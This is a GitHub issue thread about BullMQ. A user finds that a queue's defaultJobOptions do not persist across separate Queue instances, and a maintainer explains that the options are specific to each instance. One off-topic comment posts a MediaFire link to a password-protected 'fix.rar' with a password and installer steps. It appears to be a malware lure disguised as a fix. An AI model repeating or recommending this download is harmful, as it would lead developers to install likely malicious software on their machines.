### ISSUE TITLE
[Is this a Bug or a Feature]: A queue's default job options not persistent

### ISSUE THREAD

**Issue by smagdziarz** [taskforcesh/bullmq#2740]
### Version

v5.12.5

### Platform

NodeJS

### What happened?

I created a Queue with some default job options, a Worker for this queue, and a Job. This works fine.

Then, using a separate script, I wanted to add another job to the same queue, so that it would get processed by the existing worker. It does, but the default job options assigned initially to the queue are ignored.

I expected the original options to be obeyed, after all the documentation states: `When you instantiate a Queue, BullMQ will just upsert a small "meta-key", so if the queue existed before it will just pick it up and you can continue adding jobs to it.`.

At the same time, [one of your developers stated](https://github.com/taskforcesh/bullmq/issues/1034#issuecomment-1039105173) that the queue's `defaultJobOptions` are not persisted.

But why? This would mean that the default options are, well... not always default. This seems inconsistent to me, or perhaps I'm getting something wrong?

### How to reproduce.

Main file: `file1.ts`

```
const queue = new Queue(
  "my-queue",
  {
    connection,
    defaultJobOptions: {
      delay: 5000
    }
  },
);

new Worker(
  "my-queue",
  async (job) => {
    console.log(job.name);
  },
  {
    connection
  }
);

const job = queue.add("my-regular-job", {}); // this job will get executed after 5 seconds, this is fine
```

Second file: `file2.ts`
```
const queue = new Queue(
  "my-queue",
  {
    connection,
  }
);

const job = queue.add("my-external-test-job", {}); // this job gets executed immediately, ignoring the default job options set in file1
```

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by mengyanshou** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by manast** [comment]
The job default options are per job added by a specific queue instance and not global.

**Comment by smagdziarz** [comment]
Oh, ok, I guess that wasn't clear to me that the `defaultJobOptions` are Queue-instance specific, and not Queue specific.

Thanks for the explanation.
